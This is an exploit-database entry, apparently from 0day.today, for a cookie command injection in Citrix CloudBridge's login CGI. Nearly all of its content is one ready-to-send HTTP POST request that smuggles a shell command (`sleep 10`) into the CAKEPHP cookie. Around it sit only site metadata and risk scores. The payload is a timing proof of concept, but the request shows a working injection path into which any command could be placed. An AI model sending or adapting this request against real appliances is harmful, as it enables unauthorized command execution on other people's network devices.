Lucene search

K
zdtXort1337DAY-ID-28158
HistoryJul 20, 2017 - 12:00 a.m.

Citrix CloudBridge - CAKEPHP Cookie Command Injection Vulnerability

2017-07-2000:00:00
xort
0day.today
52

0.962 High

EPSS

Percentile

99.5%

Exploit for cgi platform in category web applications

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
 
action=logout

#  0day.today [2018-01-05]  #

0.962 High

EPSS

Percentile

99.5%